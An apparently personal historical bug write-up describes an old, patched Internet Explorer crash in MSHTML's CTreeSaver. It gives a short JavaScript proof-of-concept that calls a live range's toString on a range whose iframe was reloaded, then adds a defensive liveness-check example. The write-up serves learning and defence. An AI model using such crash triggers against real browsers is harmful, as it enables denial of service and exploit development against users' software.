A deadcall crash involving selection ranges: obtaining a range from an IFrame’s selection, reloading the IFrame to destroy the range’s context, and calling toString() from a live range on behalf of the dead one caused a crash in MSHTML!CTreeSaver::CTreeSaver.

// Assumed setup (not in the original snippet): a same-origin <iframe> is already in the page,
// and iFrame is its window object.
var iFrame = frames[0];

// Select everything inside the iframe and keep a Range that lives in the iframe's document.
iFrame.document.body.focus();
iFrame.document.execCommand("SelectAll");
var badRange = iFrame.getSelection().getRangeAt(0);

// Select everything in the top-level document and keep a Range that lives there.
document.body.focus();
document.execCommand("SelectAll");
var goodRange = getSelection().getRangeAt(0);

// Reloading the iframe tears down the markup that badRange was created against.
iFrame.location.reload();

// After the reload, invoke the live range's toString with the dead range as `this`.
setTimeout(function() {
    goodRange.toString.call(badRange); // Crash
}, 0);

This was filed with the related bug WOOBR #1112476. The toString call attempted to serialize the range’s content, which involved walking the backing markup tree. With the markup freed by the reload, the tree saver tried to dereference a null markup pointer in its constructor, causing the access violation.
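As an added example that is not part of the original note, the following shows the caller-side check a script could make before serializing a Range: confirm that the range's boundary nodes still belong to a document that has a window (a document whose iframe was reloaded reports defaultView === null), and refuse a `this` that is not a range at all. The DOM objects below are constructed stand-ins so the file runs outside a browser; the `rangeIsLive`, `safeRangeToString`, `makeDoc` and `makeRange` names are mine, and the reload is simulated by clearing the stand-in document's defaultView.

```javascript
// Returns true only when the range still has a live document behind it:
// every boundary node must be attached to a document that still has a window.
function rangeIsLive(range) {
  if (!range || typeof range !== "object") return false;
  for (const node of [range.startContainer, range.endContainer]) {
    if (!node) return false;
    // A Document node has no ownerDocument; it is its own document (nodeType 9).
    const doc = node.ownerDocument || (node.nodeType === 9 ? node : null);
    if (!doc) return false;
    // A document whose browsing context has been torn down (for example, its
    // iframe was reloaded) reports defaultView === null. Nodes of such a document
    // are exactly the freed markup the crashing toString() tried to walk.
    if (doc.defaultView === null || doc.defaultView === undefined) return false;
  }
  return true;
}

// Serialize a range only after the liveness check; returns null instead of
// touching a range whose context is gone or an object that is not a range.
function safeRangeToString(range) {
  if (!rangeIsLive(range)) return null;
  return range.toString();
}

// ---- constructed fixtures standing in for browser objects (not real DOM) ----
function makeDoc() {
  return { nodeType: 9, defaultView: {} }; // live document: has a window
}
function makeRange(doc, text) {
  const node = { nodeType: 3, ownerDocument: doc }; // a text node in doc
  return { startContainer: node, endContainer: node, toString() { return text; } };
}

const topDoc = makeDoc();
const frameDoc = makeDoc();
const goodRange = makeRange(topDoc, "selected text");
const badRange = makeRange(frameDoc, "stale selection");

// Simulate the iframe reload: the old document loses its window.
frameDoc.defaultView = null;

// Stand-alone demonstration; the guard refuses the dead range instead of walking it.
if (typeof require !== "undefined" && require.main === module) {
  console.log(safeRangeToString(goodRange)); // "selected text"
  console.log(safeRangeToString(badRange));  // null
  console.log(safeRangeToString({}));        // null: not a range at all
}
```

The check mirrors what the engine-side fix had to do: validate that the markup behind the range still exists before dereferencing it, rather than trusting that a Range object implies a live tree.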

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.